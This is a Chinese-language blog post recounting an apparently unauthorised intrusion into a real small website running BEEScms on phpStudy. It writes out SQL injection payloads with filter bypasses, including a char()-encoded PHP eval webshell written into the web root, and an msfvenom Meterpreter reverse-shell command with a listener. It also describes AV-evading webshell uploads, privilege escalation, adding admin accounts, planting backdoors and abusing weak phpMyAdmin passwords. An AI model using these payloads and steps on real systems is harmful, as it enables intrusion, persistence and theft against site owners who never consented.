記錄某一次無意點開的一個小網(wǎng)站的滲透過程，幸運的是搭建平臺是phpstudy，cms是beecms，beecms有通用漏洞，然后去網(wǎng)上找了資料，成功getshell并獲取服務(wù)器權(quán)限。

一、滲透過程

無意點開一個網(wǎng)站，發(fā)現(xiàn)網(wǎng)站比較小，且看起來比較老，然后發(fā)現(xiàn)logo沒有改，于是乎去百度搜索這個cms，發(fā)現(xiàn)有通用漏洞，Beecms 通用漏洞

這里運氣比較好，沒有更改后臺地址，還是默認地址/admin/login.php

通過通用漏洞發(fā)先后臺管理處存在sql注入漏洞，直接輸入admin’，然后就會報錯，這里用萬能密碼不能登陸，看來還是得通過上面得通用漏洞來進行注入

可以看到輸入payload后，頁面返回正常，從而可以判斷有sql注入，這里采用雙寫進行繞過

發(fā)現(xiàn)這個注入點后，就有各種各樣的注入方式了，通過sql語句寫入一句話，sqlmap一把梭，手工注入得到賬號密碼等等，怎么方便怎么來,這里我把幾種方法都寫一下，看看那種方法可以

方法一

1.通過post抓包sqlmap一把梭，dump出管理員賬號密碼，進后臺找上傳點

2.一把梭，發(fā)現(xiàn)并沒有，使用腳本也沒有繞過

方法二

1.通過burp抓包，寫入一句話，payload：admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#，發(fā)現(xiàn)寫入失敗，前面講到有防護，這里通過hex編碼或者char函數(shù)繞過

2.對shell部分進行編碼

3.寫入shell的payload為:注意:記得在編碼轉(zhuǎn)換的時候前面加0x或者直接用unhex函數(shù),但是本次實驗用unhex函數(shù)一直失敗,所以在前面加0x，看到可以寫入成功。

ps:這里的寫入路徑純屬盲猜，運氣好，默認目錄

4.用蟻劍連接,成功連接，至此getshell完畢，下來就是后滲透階段，后面會講

char函數(shù)繞過:mysql內(nèi)置函數(shù)char()可以將里面的ascii碼轉(zhuǎn)換為字符串，payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

一樣成功寫入

1.寫入成功后，菜刀可以連接，我們訪問寫入的文件，驚奇的發(fā)現(xiàn)竟然有admin，和一串md5碼，大膽猜測可能是后臺賬號和密碼，試一下

2.md5解密，wocao，成功登陸，然后就是后臺找上傳了

二、后滲透

通過whoami查看權(quán)限，發(fā)現(xiàn)是admin權(quán)限，但是不是最高權(quán)限，我們要提到最高權(quán)限去

方法一

1.通過msf生成木馬提權(quán)，payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通過蟻劍上傳木馬，并執(zhí)行。執(zhí)行之前打開msf使用模塊use exploit/multi/handler，設(shè)置相應(yīng)參數(shù)，然后開始監(jiān)聽

3.不知道什么問題，用這個沒有成功，那么只能通過大馬提權(quán)了

方法二

1.上傳大馬，此處應(yīng)該有狗或者盾之類的，用的免殺，成功上傳

2.訪問大馬

3.這里提權(quán)方式很多，就不細說了,有大馬之后很多操作都可以引刃而解了，開放端口，添加賬號，留后門。。等等

4.創(chuàng)建admin權(quán)限賬號之后，登陸服務(wù)器

三、一些其他的發(fā)現(xiàn)

通過掃描目錄，還發(fā)現(xiàn)有phpmyadmin，可以爆破，這里我試了下竟然是弱口令，都是root，但是連接不上，只能通過phpmyadmin登陸，發(fā)現(xiàn)是低版本的phpstudy搭建的，這里就可以另一種思路，利用日志文件寫入一句話getshell

四、總結(jié) 1.前臺sql注入獲取用戶名密碼，進入后臺找上傳 2.SQL注入語句寫入一句話 3.phpmyadmin一句話getshell 4.上傳大馬提權(quán)

至此，滲透結(jié)束。

審核編輯：劉清